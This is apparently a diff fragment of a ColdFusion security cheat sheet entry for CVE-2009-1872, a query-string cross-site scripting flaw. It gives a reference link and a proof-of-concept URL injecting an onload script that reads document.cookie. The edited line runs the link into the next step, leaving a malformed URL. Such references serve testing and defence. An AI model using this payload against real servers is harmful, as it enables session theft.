ColdFusion Cheat Sheet

 # CVE-2009-1872 - Adobe ColdFusion Server Query String Cross-Site Scripting

-detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info
+detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info1. open file in browser

 http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm?component=<body%20onload=alert(document.cookie)>